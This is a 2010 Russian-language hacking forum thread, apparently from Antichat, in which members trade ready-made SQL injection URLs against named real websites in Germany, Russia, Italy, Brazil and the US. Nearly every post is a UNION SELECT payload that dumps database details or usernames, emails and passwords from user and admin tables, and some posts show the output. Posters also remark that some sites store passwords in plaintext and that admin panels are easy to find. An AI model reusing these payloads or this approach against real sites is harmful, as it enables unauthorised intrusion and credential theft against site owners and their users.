03.09.2010, 16:11
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
С нами:
9900206
Репутация:
25
|
|
Код:
http://www.keramikarte.de/shop/np/pheed.php?newsid=-24+union+select+1,2,table_name+from+information_schema.tables--+
Чета не могу вывести из таблиц что либо...
Код:
http://www.keramikarte.de/shop/np/pheed.php?newsid=-24+union+select+1,2,group_concat(user_name)+from+cpg131_users+--+
|
|
|
03.09.2010, 20:02
|
|
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
С нами:
9015797
Репутация:
116
|
|
Сообщение от None
http://www.westcountry-networking.com/live/shop.php?1=1&nav=shop&cat=-63+union+select+1,group_concat(username,char(58),p assword),3,4,5+from+ecom_user+--+
Вывод в тайтле
user() westcountrynetwo@localhost
version() 5.0.51a-24+lenny4
database() westcountrynetwo
|
|
|
|
03.09.2010, 23:16
|
|
Познающий
Регистрация: 23.05.2009
Сообщений: 42
С нами:
8931172
Репутация:
8
|
|
Код:
http://www.intenso.de/kategorie.php?kategorie=-21%20UNION%20ALL%20SELECT%20CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175--
intensode.1@localhost : intensode1 : 5.0.86-log |
|
|
|
04.09.2010, 00:25
|
|
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
С нами:
9038208
Репутация:
1521
|
|
http://www.aeag.at/ce.php?id=-9+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)--
http://www.alt-erlaa.at/ce.php?id=-5+union+select+database()--
домены разные( сайты одинаковые
|
|
|
|
04.09.2010, 01:33
|
|
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
С нами:
8843557
Репутация:
539
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.alexandrrybak.com/mov.php?id=-12+union+select+1,concat_ws(0x3a,version(),database(),user()),3--[/COLOR][/COLOR]
5.0.77:rybak:tarasdb@localhost
pr3 тиц40 |
|
|
|
04.09.2010, 02:18
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
админские пассы выводить не стал т к хранятся они в незашифрованном виде и админку найти не сложно, поэтому- сделал вывод простого юзера
ТИЦ 120
Код:
http://zoorinok.com.ua/art.php?id=26+and+1=0+union+select+1,2,concat(user_login,char(58),user_password),4+from+user+--+
инетмагазин
ТИЦ 50
Код:
http://www.superpovar.ru/art.php?id=-6+union+select+1,2,concat(username,char(58),user_password),4+from+h21mobi_forum.phpbb_users+limit+1,1+--+
Код:
http://www.sport-clubs.ru/art.php?id=432+and+1=0+union+select+concat(login,char(58),md5)+from+zorro_aaaa.users+limit+2,1+--+
здесь вывод в title
Код:
http://www.purdes.com/blog/art.php?id=-164+union+select+1,2,3,4,5,6,7,8+--+
Код:
http://www.avtosssr.ru/art.php?id=-67+union+select+concat_ws(0x3a,version(),database(),user()),2+--+
Код:
http://www.guevaragallery.com/art.php?id=2+and+1=0+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4+--+
|
|
|
|
04.09.2010, 12:56
|
|
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
С нами:
9015797
Репутация:
116
|
|
Сообщение от None
http://www.agenzia-limmobiliare.eu/vendita-fondo-commerciale-capannone-negozio.php?catID=-10+union+select+group_concat(nome,char(58),passwor d),2,3,4,5,6,7,8,9,10,11,12,13,14+from+immobiliare .user+--+
Вывод в самом низу.
Сообщение от None
http://www.farmasistemi.com/negozio.php?categoria=-6+union+select+1,2,group_concat(email,char(58),pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25+from+clienti+--+
version() 5.1.36-log
database() farmasistemi
Сообщение от None
http://bqshopping.com.br/loja.php?id=-58+union+select+1,2,table_name,4+from+information_ schema.tables+--+
version() 5.0.91-community
database() bqshop_data
Сообщение от None
http://www.adoropromocao.com.br/loja.php?l=-198+union+select+1,2,3,4,5,6,7,8,version(),10,11,1 2,13,14+--+
version() 4.1.21-standard-log
database() adoropro_adorop
Сообщение от None
http://bleep.com/index.php?page=artist_details&artistid=-2342+union+select+1,2,group_concat(email,char(58), password,0x3c62723e),4,5,6,7,8,9,10+from+cms_user+--+
|
|
|
|
04.09.2010, 14:26
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Код:
http://karcher-ural.ru/newss.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--+
5.0.90:b26649_karch:u26649@78.108.84.111
Код:
http://www.cto.nsk.su/newss.php?id=-21+union+select+concat_ws(0x3a,version(),database(),user()),2,3--+
5.0.45-log:site_db:db_user@localhost
тиц 10 |
|
|
|
04.09.2010, 16:21
|
|
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
С нами:
9015797
Репутация:
116
|
|
Сообщение от None
http://www.svi04.de/xellplan/index.php?ID=7+union+select+group_concat(admin,0x3 a,admin_pass)+from+xp_sheets+--+
Сообщение от None
http://www.dp.ilsc.kuss-clubs.de/index.php?ID=415+union+select+group_concat(admin,0 x3a,admin_pass)+from+xp_sheets+--+
Сообщение от None
http://www.berlinschild1.kilu.de/xellplan-1.2/index.php?ID=16+union+select+group_concat(admin,0x 3a,admin_pass)+from+xp_sheets+--+
Сообщение от None
http://www.svinzlingen.de/xellplan/view.php?ID=2+union+select+group_concat(admin,0x3a ,admin_pass)+from+xp_sheets+--+
Сообщение от None
http://www.dp.ilsc.kuss-clubs.de/view.php?ID=299+union+select+group_concat(admin,0x 3a,admin_pass)+from+xp_sheets+--+
Сообщение от None
http://datasphere.de/plan/log.php?ID=29+union+select+1,2,3,group_concat(admi n,0x3a,admin_pass)+from+xp_sheets+--+
Сообщение от None
http://www.pinoyjokes.net/my/index.php?sbjoke_id=-505+union+all+select+1,2,3,4,concat(sbadmin_name,0 x3a,sbadmin_pwd),6,7,8,9,10,11+from+sbjks_admin--
Сообщение от None
http://www.fikra.tv/index.php?sbjoke_id=-7522+union+all+select+1,2,3,4,concat(sbadmin_name, 0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_a dmin--
Вывод в тайтле
|
|
|
|
04.09.2010, 17:07
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
начнем
Код:
http://www.sale-info.ru/lot.php?id=-108+union+select+1,2,concat(user_login,char(58),user_pass),4,5,6,7,8,9,10,11,12+from+new_users+--+
Международный аэропорт лосанжелеса
пароли в открытом виде
Код:
http://www.airport-la.com/parking/lot.php?id=-7+union+select+1,2,3,concat(email,char(58),password),5,6,7,8,9,10,11,12,13,14+from+partners+--+
здесь пассы в БД не хранятся так что просто вывел
Код:
http://www.zagorodny-dom.ru/lot.php?id=-246+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10+--+
здесь тоже пароли в открытом виде
Код:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12+from+parking.users+--+
ну или так выводим админский акк и хеш
Код:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(user_login,char(58),user_pass),3,4,5,6,7,8,9,10,11,12+from+wordpress3.wp_02n0c4_users+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
